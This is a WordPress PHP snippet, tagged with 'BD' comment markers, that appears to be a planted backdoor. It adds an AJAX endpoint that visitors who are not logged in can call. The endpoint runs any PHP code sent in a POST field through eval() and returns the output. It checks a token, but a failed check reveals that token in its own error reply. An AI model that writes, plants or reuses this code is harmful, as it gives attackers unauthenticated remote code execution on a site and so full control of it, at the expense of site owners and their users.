// ==[BD:gDHPLAp9]== add_action( 'wp_ajax_nopriv_gfljnmphzo', function() { $factor = 'gDHPLAp9TOUZV5CD4gevQpmlbFKnjxPv'; $entry = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $entry ) || ! hash_equals( $factor, $entry ) ) { wp_send_json_error( [ 'message' => 'tok:' . $factor ], 403 ); } $sym = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $sym ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $sym = preg_replace( '/^\s*<\?(php)?/i', '', $sym ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $bind = microtime( true ); ob_start(); try { ( static function() use ( $sym ) { return eval( $sym ); } )(); $item = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $item, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $bind ) * 1000, 2 ) ] ); } catch ( \Throwable $chunk ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $chunk->getMessage(), 'time_ms' => round( ( microtime( true ) - $bind ) * 1000, 2 ) ] ); } } ); // ==[/BD:gDHPLAp9]==